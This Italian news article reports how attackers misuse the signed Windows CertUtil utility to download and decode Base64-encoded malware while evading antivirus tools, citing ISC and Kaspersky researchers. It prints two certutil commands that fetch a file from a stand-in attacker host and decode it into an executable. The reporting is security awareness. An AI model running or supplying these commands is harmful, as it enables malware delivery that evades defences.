L'utilità CertUtil di Windows utilizzata per scaricare e installare malware

Il programma Microsoft integrato in Windows che consente di gestire i certificati digitali viene sfruttato abusivamente dai criminali informatici per eseguire codice malevolo sul sistema degli utenti passando inosservati alla scansione delle soluzioni antimalware.

La sfida tra i criminali informatici e gli sviluppatori software – in particolare i produttori di soluzioni per la sicurezza – è un continuo inseguimento tra gatto e topo.

Alcuni ricercatori hanno scoperto che l’utilità CertUtil, integrata in Windows e utilizzata per la gestione dei certificati digitali da prompt dei comandi, può essere utilizzata in modo abusivo per scaricare ed eseguire sul sistema dell’utente codice malevolo.
CertUtil è un componente di sistema che reca la firma digitale Microsoft è che quindi viene riconosciuto come del tutto legittimo da qualunque software per la sicurezza.


Gli aggressori hanno però a più riprese iniziato ad utilizzarlo per disporre il download di malware passando inosservati al controllo delle soluzioni per la sicurezza, comprese quelle che agiscono a livello centralizzato.

Il ricercatore Xavier Mertens ha pubblicato sul sito di ISC un post in cui spiega come un malintenzionato possa richiedere il download e la successiva esecuzione di codice malware salvato su un server remoto con codifica Base64.
Eseguendo semplicemente le seguenti due istruzioni, l’aggressore può scaricare il file nocivo con l’utilità CertUtil, richiederne la decodifica per poi passare alla sua esecuzione:

certutil.exe -urlcache -split -f "https://hackers.home/badcontent.txt" bad.txt
certutil.exe -decode bad.txt bad.exe

Fabio Assolini, ricercatore presso Kaspersky, puntualizza che si tratta di una tecnica già adoperata dai malware writers. Di recente, però, è tornata prepotentemente in voga dimostrando come i criminali informatici siano alla ricerca di nuovi strumenti per passare il più possibile inosservati a antimalware e altri strumenti per la sicurezza.

Ti consigliamo anche

Link copiato negli appunti